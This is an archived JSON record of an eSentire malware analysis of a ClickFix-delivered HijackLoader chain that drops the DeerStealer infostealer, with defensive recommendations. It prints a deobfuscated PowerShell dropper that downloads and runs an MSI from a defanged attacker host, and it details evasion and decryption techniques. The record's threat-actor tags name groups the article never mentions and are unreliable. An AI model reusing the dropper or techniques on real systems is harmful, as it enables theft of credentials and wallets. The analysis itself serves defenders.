{
	"id": "419f94cb-1a7d-4a5b-a979-8976caf7f79c",
	"created_at": "2026-04-06T00:12:40.538249Z",
	"updated_at": "2026-04-10T13:11:54.791355Z",
	"deleted_at": null,
	"sha1_hash": "c21631840d82b4ce1c76b63c154748ab3013bffc",
	"title": "Don't Get Caught in the Headlights - DeerStealer Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2699894,
	"plain_text": "Don't Get Caught in the Headlights - DeerStealer Analysis\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 23:15:17 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nWhat did we find?\r\nThroughout May 2025, eSentire's Threat Response Unit (TRU) detected several attempts by threat actors to\r\ndownload and execute HijackLoader. Many of these attempts involved the attempted deployment of DeerStealer\r\nAKA XFiles as the final payload, a sophisticated information stealer being sold on dark-web hacking forums by\r\nthe user “LuciferXfiles”.\r\nKey components in observed attack chains involve the use of the ClickFix initial access method, where victims\r\nare redirected to a phishing page prompting the user to execute a malicious command in the Windows Run\r\nPrompt. 
Immediately following is the download and execution of HijackLoader, a malware loader that first emerged in 2023 and is known for its use of steganography to store malware configuration settings and modules in an encrypted PNG image.\r\nThe final payload, known as “DeerStealer”, offers threat actors extensive capability to harvest cryptocurrency wallets, instant messengers, VPNs, and browser cookies, passwords, credit cards, and autofill data from victim machines. The malware continues to evolve, with planned features including macOS support, AI integration, and automated crypto balance checking.\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 1 of 19\n\nFigure 1 – XFiles Spyware advertisement image on hacking forum\r\nKey Features\r\nBasic subscription tier includes DeerStealer, higher tiers include Hidden Spyware module\r\nHidden VNC capability for stealthy remote desktop control\r\nSecure communication via HTTP protocol with custom encryption\r\nProxy domain system (Gasket) to hide true server IP address and increase persistence\r\nPersonal server setup for each client\r\nBrowser-based control panel supporting multi-bot management and team collaboration\r\nCore Functionalities\r\nProcess management\r\nRemote command execution\r\nMass bot control options\r\nHidden VNC with up to 30 FPS\r\nCryptocurrency Features\r\nExtensive “clipper” (clipboard hijacking) functionality supporting 14+ cryptocurrency types\r\nCollection of 800+ browser crypto wallet extensions, with ability for threat actors to add custom extension targets\r\nDesktop and USB crypto wallet targeting\r\nData Collection\r\nLive keylogging\r\nBrowser data harvesting (cookies, passwords, autofill, cards)\r\nMessenger, FTP, VPN, and gaming client data\r\nEmail client and password manager targeting\r\nAttack Chain\r\nThe attack chain is 
described in the figure below. Initial access begins when the victim runs an encoded PowerShell command from a ClickFix page in a Run prompt.\r\nThis command downloads and executes a Microsoft Installer (MSI) named “now.msi”. This installer copies several files into C:\\ProgramData and proceeds to execute the legitimate and signed COMODO Internet Security binary (EngineX_Co64.exe).\r\nThis file isn’t malicious by itself and normally loads a signed DLL, “cmdres.dll”, from the same directory; in this case, however, it is seen loading an unsigned version of cmdres.dll. Further investigation reveals this DLL has a hook installed in the CRT that redirects control flow to the first stage of the attack, which is shown later in the blog.\r\nFigure 2 – ClickFix initial access\r\nThe contents of the decrypted/deobfuscated PowerShell can be seen below, showing how the LOLBin curl.exe is used to download the HijackLoader dropper MSI and execute it via msiexec.exe.\r\n$AqEVu = $env:AppData;\r\nfunction kWERDs($EIpoJdP, $wQmPq){curl $EIpoJdP -o $wQmPq};\r\nfunction zPWQQKzb($CAvStqT){kWERDs $CAvStqT $wQmPq}\r\n$wQmPq = $env:AppData + '\\now.msi';\r\nzPWQQKzb \"hxxps://luckyseaworld[.]com/now.msi\";\r\nmsiexec.exe /i $wQmPq;;\r\nFigure 3 – Deobfuscated PowerShell dropper contents\r\nFigure 4 – Attack chain diagram\r\nHijackLoader Analysis\r\nOn the left side of the figure below, the disassembly of the legitimate, signed cmdres.dll can be seen, which calls __scrt_initialize_crt – a legitimate function responsible for initializing the C runtime (CRT).\r\nOn the right-hand side of the figure, however, we can see a patch has been applied to hook and redirect execution elsewhere.\r\nFigure 5 – Patched CRT in cmdres.dll\r\nAfter hijacking control flow, 
the purpose of this stage is to resolve APIs and read/decrypt the next stage. APIs are resolved dynamically by enumerating the exports of kernel32 and comparing each export name to pre-computed hashes.\r\nThe hashing routine iterates over each byte of an export name, adding the byte to twice the running hash value and masking the result to 32 bits with a bitwise AND. The following Python code can be used to simulate this hashing technique.\r\nIn order to ease the analysis process, we created a Python script, available here, to resolve hashes to their corresponding API and set comments in IDA Pro.\r\ndef custom_hash(constant: int, export_name: str) -\u003e int:\r\n    # 'constant' seeds the hash and is replaced by the running value after each byte\r\n    hash_value = 0x00000000\r\n    for char in export_name:\r\n        # add the byte to twice the previous value, masked to 32 bits\r\n        hash_value = (ord(char) + (constant * 2)) \u0026 0xFFFFFFFF\r\n        constant = hash_value\r\n    return hash_value\r\nFigure 6 – Hashing algorithm pseudo-code\r\nThe following APIs are resolved and are used in the process of reading/decrypting the next stage and module stomping the legitimate binary vssapi.dll (LoadLibraryA and VirtualProtect).\r\nNote, original permissions are restored via VirtualProtect following the module stomping process.\r\nFatalAppExitW\r\nLocalAlloc\r\nSetCurrentDirectoryW\r\nGetModuleFileNameW\r\nCreateFileA\r\nGetFileSize\r\nReadFile\r\nLoadLibraryA\r\nVirtualProtect\r\nCmdres.dll contains a constant that is used as an offset to the beginning of a header in Bairrout.xd. This header begins with a DWORD that contains the size of the ciphertext. 
The next DWORD in the header is the key used to decrypt the ciphertext: the decryption loop walks the ciphertext four bytes at a time, adding this key to each DWORD and writing the result back in place, until the end of the ciphertext is reached.\r\nThe basic block responsible for reading Bairrout.xd via ReadFile, navigating to the header of the file via the hard-coded offset, and decrypting the contents can be seen in the figure below.\r\nTo ease the analysis process, we created an IDA Python based script to automate this behavior and dump the decrypted shellcode, available here.\r\nFigure 7 – Basic blocks that decrypt next stage\r\nThe figure below displays the contents of Bairrout.xd at the aforementioned offset, which contains the 8-byte file header composed of the ciphertext size and key. The remaining bytes are the ciphertext.\r\nFigure 8 – Annotated hex view of encrypted next stage\r\nThe purpose of the next stage is to module stomp the legitimate binary input.dll with core HijackLoader shellcode. The inject process (legitimate signed Q-Dir renamed as SecureLoader_test.exe) is then started in a suspended state, the HijackLoader configuration is decrypted/parsed from Kleanmean.py, and the DeerStealer payload is written to a new section in the inject process.\r\nFinally, the legitimate binary d3d9.dll is module stomped with shellcode which serves to resume the inject process. The extraction of all modules and configuration data from the Kleanmean.py file is achievable through ZScaler's HijackLoader configuration extractor, which is detailed in the blog available here.\r\nDespite this extractor being publicly available for approximately one year, the threat actors responsible for HijackLoader appear either unaware of or indifferent to its existence. 
The configuration extractor's output is illustrated in the figure below.\r\nIt is worth noting that our analysis of the extracted samples has not revealed any new HijackLoader modules.\r\nFigure 9 – Stdout of HijackLoader configuration extractor\r\nDeerStealer Analysis\r\nDeerStealer is a sophisticated information stealer sold by the user @LuciferXfiles on dark-web hacking forums. It is called DeerStealer by LuciferXfiles himself, though he also refers to the full package with the loader as “XFiles Spyware”.\r\nPricing is based around a tiered subscription-based model starting at $200 per month for “Premium”, $450 per month for “Thief”, $1500 per month for “Thief+”, and $3000 per month for “Professional”.\r\nThreat actors that purchase higher tier subscriptions gain access to custom ClickFix scripts, “recrypt” or re-packing of the payload, EV signing, and other features.\r\nControl Flow Obfuscation\r\nDeerStealer employs a significant amount of obfuscation in order to hinder the analysis process and evade antivirus signatures. The builder for DeerStealer produces payloads that have around 50% similarity when compared against one another.\r\nThis involves using assembly obfuscation techniques where basic blocks contain “junk” operations, such as bogus function calls, bogus operations on registers, etc. This effectively masks the true control flow and makes static analysis much more difficult.\r\nThe figure below displays the similarity rating (44%) between two routines that serve to decrypt the C2 proxy URL. 
This effectively demonstrates how control flow obfuscation plays a significant role in defeating static analysis techniques.\r\nFigure 10 – Similarity between C2 URL decryption routines\r\nSimple Virtual Machines for String Decryption\r\nUnique jump-tables, effectively simple virtual machines, are used to decrypt the C2 URL and the strings used throughout the sample, and the control flow obfuscation makes understanding these virtual machines that much more difficult.\r\nIn analyzed variants, the virtual machine makes use of various bitwise operations, such as XOR, AND, etc. for decryption. This decryption process is unique from sample to sample.\r\nFigure 11 – Jumptable VM example used in decrypting C2 URL\r\nAutomating string decryption is challenging for these reasons; however, by emulating the string decryption routine and creating YARA rules to match various basic blocks, we successfully created a string decryption/config extraction script, available here. An example dump of decrypted strings we identified in our analysis can be found here.\r\nFigure 12 – Simple obfuscation\r\nThe following figure shows output of the string decryption IDA Python script for DeerStealer, which sets comments where strings are referenced in the assembly. Note, be sure to check out the comments left at the top of the script for instructions on usage.\r\nFigure 13 – IDA python script\r\nC2 Communication\r\nCommunication with the C2 proxy happens over HTTPS, where first the victim machine is fingerprinted, and an encrypted response is returned by the C2 containing the malware configuration. 
After a few successful responses from the C2 and retrieval of its malware configuration, communication is one-way, as described in the blog published by Any.Run.\r\nSince the publishing of that blog, many improvements have been made to the C2 communication process, and a simple XOR over each byte is no longer used to encrypt request data.\r\nThe initial request to the C2 proxy contains several identifiers to fingerprint the victim machine, including the InstallDate, InstallTime, and machine GUID from the registry keys below, and the machine’s processor name. Subsequent requests contain encrypted zip files containing harvested information. The name of the CPU is acquired via the CPUID instruction.\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\InstallTime\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\InstallDate\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid\r\nFigure 14 – Usage of CPUID instruction to retrieve processor name\r\nThe initial C2 request contains data matching the following structure, though some of this data likely changes between samples.\r\n#include \u003cstdint.h\u003e\r\ntypedef struct {\r\n    uint8_t  processor_length;  // Length of processor string\r\n    char*    processor_string;  // Processor string (variable length)\r\n    uint16_t magic1;            // Hard-coded \\xA0\\xCE\r\n    uint32_t install_date;      // 4 bytes installation date\r\n    uint8_t  magic2;            // Hard-coded \\xCF\r\n    uint64_t install_time;      // 8 bytes installation time\r\n    uint16_t magic3;            // Hard-coded \\xD9\\x24\r\n    uint8_t  hwid[36];          // 36 bytes machine GUID/HWID\r\n    uint8_t  padding[16];       // 16 bytes of \\xFF\r\n} c2_checkin_t;                 // typedef name added here for readability, not taken from the sample\r\nFigure 15 – Example structure of initial C2 check in\r\nFigure 16 – Annotated hex dump of initial C2 check in\r\nLog Structure\r\nStolen 
credentials and files are packaged in the following structure. This is what threat actors see when they download logs for a specific victim machine.\r\nFigure 17 – Directory listing of exfiltrated credentials and data\r\nClipper\r\nDeerStealer allows threat actors to target the clipboard of victim machines, substituting threat-actor-supplied crypto-wallet addresses for those copied by the victim. The full list of currently supported crypto-wallet address types is as follows.\r\nBitcoin Legacy and P2SH Addresses\r\nBitcoin Bech32 Addresses\r\nMonero (XMR)\r\nStellar (XLM)\r\nRipple (XRP)\r\nLitecoin (Legacy) (LTC)\r\nLitecoin (Bech32) (LTC)\r\nNeocoin (NEO)\r\nBitcoin Cash (Legacy and New)\r\nDashcoin (DASH)\r\nDogecoin (DOGE)\r\nBinance chain (BEP2)\r\nEthereum (ETH) (ERC-20) or (BEP-20)\r\nTRON (TRX) or TRC-20\r\nZcash (ZEC)\r\nThe figure below displays the “Clipper” section of the XFiles Spyware admin panel.\r\nFigure 18 – Clipper administration panel menu\r\nBrowser Harvesting\r\nMore than 50 web browsers are targeted by DeerStealer, where stored cookies, passwords, autofill, and credit cards are harvested. 
Cookies from Chromium-based browsers are retrieved from memory following successful communications with the C2 server.\r\nThis involves starting a new instance of the Chromium-based browser; the following command lines are examples for Microsoft Edge and Google Chrome.\r\n\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window\r\n\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --force-high-res-timeticks=disabled --always-read-main-dll --field-trial-handle=2948,i,15397448069048126570,5460957643742959585,262144 --variations-seed-version --mojo-platform-channel-handle=3436 /prefetch:11\r\n\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"\r\n\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=crashpad-handler \"--user-data-dir=C:\\Users\\User\\AppData\\Local\\Google\\Chrome\\User Data\" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler \"--database=C:\\Users\\User\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=137.0.7151.104 --initial-client-data=0x128,0x12c,0x130,0xa4,0x134,0x7ffea4049ce8,0x7ffea4049cf4,0x7ffea4049d00\r\nBrowser Extension Harvesting\r\nDeerStealer targets 800+ browser extensions, specifically targeting the following types of extensions. 
It is possible for threat actors to specify custom extensions to target.\r\nCrypto and NFT wallets\r\nPassword managers\r\n2FA/OTP/Authentication managers\r\nNotes\r\nThe figure below displays the “Analytics” section of the XFiles Spyware admin panel, showcasing how threat actors can retrieve statistics for stolen credentials.\r\nFigure 19 – Analytics administration panel menu\r\nDesktop-based Crypto-wallet Harvesting\r\nDeerStealer targets the following desktop-based crypto-wallets.\r\nArmory\r\nAtomic\r\nCoinomi\r\nBitcoin Core\r\nExodus\r\nJaxx Liberty\r\nGuarda\r\nEver Surf\r\nMonero Core\r\nElectrum\r\nDesktop-based Instant Messenger Harvesting\r\nFor now, DeerStealer only targets Discord and Telegram, though support for WhatsApp, Signal, Pidgin, RamBox, Viber, Psi+Pidgin, tox, Matrix is planned.\r\nFTP Client Harvesting\r\nFor now, DeerStealer targets FileZilla and WinSCP, two of the more popular FTP clients, though there are plans for it to also target CoreFTP, Snowflake, CyberDuck, FTP Navigator, FTPRush, FlashFXP, Smartftp, TotalCommander, Ws_ftp, and CoreFTP.\r\nVPN Client Harvesting\r\nFor now, DeerStealer targets OpenVPN and ProtonVPN, though support for WinscribeVPN, NordVPN, TurboVPN, VPN master, EarthVPN, AzireVPN, OpenVPN, and PrivateVPN_Global_AB is planned.\r\nGaming Client Harvesting\r\nFor now, DeerStealer targets Steam, however support for Origin, Battle.net, Mojang Session, Twitch, and OBS Profiles is planned.\r\nVNC Client Harvesting\r\nThe following VNC clients are targeted by DeerStealer.\r\nTightVNC\r\nTigerVNC\r\nRealVNC\r\nUltraVNC\r\nThe figure below displays how stolen wallets and VNC credentials are displayed in the administration panel, offering threat actors a preview of stolen logs.\r\nFigure 20 – Logs 
preview\r\nRemote Desktop Client Harvesting\r\nFor now, DeerStealer targets AnyDesk and Windows RDP, though support for TeamViewer is planned.\r\nEmail Client Harvesting\r\nFor now, DeerStealer targets Thunderbird and Outlook (New, Classic, and Office 2016 with password decryption), however support for Foxmail, EMClient, Mailbird, and Mailspring is planned.\r\nFile Grabber\r\nThrough the file grabber module, threat actors can retrieve files from victim machines by specifying rules, or in other words, paths and file extensions to exfiltrate. The figure below displays the FileGrabber menu entry in the administration panel.\r\nFigure 21 – File Grabber menu in the administration panel\r\nSubscription Tiers\r\nAs previously mentioned, XFiles Spyware is sold through a subscription-based model, where each tier provides threat actors with more advanced features/services.\r\nPremium ($200/month)\r\n24/7 Support\r\nPremium Matrix chat access\r\n20 user team limit\r\nWindows C++ Native Stub X64 (Stealer)\r\nManual access\r\nGoogle token recovery\r\nNon-resident Loader\r\nPublic gaskets access\r\nThief ($450/month)\r\nCrypt (Unique Stub)\r\nDefender Bypass\r\nHTML WIN+R (Run Prompt) ClickFix\r\nThief+ ($1500/month)\r\nWindows C++ Native Stub X64 (Hidden Spyware)\r\nHidden Spyware modules (HVNC, Clipper, Live Keylogger)\r\nProfessional ($3000/month)\r\nSmartscreen Bypass\r\nBrowser Alerts Bypass\r\nlnk crypt builder\r\nComplete Hidden Spyware functionality\r\nCommon Features Across All Tiers\r\n24/7 Support\r\nPremium Matrix chat\r\n20 user team limit\r\nManual access\r\nGoogle token recovery\r\nNon-resident Loader\r\nPublic gaskets access\r\nWhat can you learn from this TRU Positive?\r\nAnalysis reveals HijackLoader's use of DLL hijacking and module 
stomping techniques to deploy DeerStealer, showing how threat actors leverage legitimate signed binaries to evade detection.\r\nDeerStealer employs sophisticated obfuscation including control flow manipulation and virtual machines for string decryption, with samples showing only 50% similarity to defeat static analysis.\r\nThe malware's C2 communication occurs over HTTPS and includes detailed victim fingerprinting using system identifiers, with subsequent communications containing encrypted stolen data.\r\nTRU provides defensive teams with detailed technical analysis, including IDA Pro scripts for string decryption, configuration extraction tools, and C2 communication structure definitions.\r\nThe malware-as-a-service operates on a tiered subscription model ($200-$3000/month), with advanced features like hidden VNC, clipper functionality, and browser alert bypasses restricted to higher-tier customers.\r\nRecommendations from the Threat Response Unit (TRU)\r\nDisable the Run Prompt via GPO:\r\nUser Configuration \u003e Administrative Templates \u003e Start Menu and Taskbar \u003e Enable “Remove Run menu from Start Menu”\r\nEmploy email filtering and protection measures.\r\nUse a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) solution to detect and contain threats.\r\nImplement a Phishing and Security Awareness Training (PSAT) program that educates and informs your employees.\r\nIndicators of Compromise\r\nIndicators of Compromise can be found here.\r\nReferences\r\nhttps://any.run/cybersecurity-blog/deerstealer-campaign-analysis/\r\nhttps://www.zscaler.com/blogs/security-research/hijackloader-updates\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next Level MDR, connect with an eSentire Security Specialist now.\r\nABOUT ESENTIRE’S THREAT 
RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.\r\nSource: https://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis"
	],
	"report_names": [
		"dont-get-caught-in-the-headlights-deerstealer-analysis"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434360,
	"ts_updated_at": 1775826714,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c21631840d82b4ce1c76b63c154748ab3013bffc.pdf",
		"text": "https://archive.orkl.eu/c21631840d82b4ce1c76b63c154748ab3013bffc.txt",
		"img": "https://archive.orkl.eu/c21631840d82b4ce1c76b63c154748ab3013bffc.jpg"
	}
}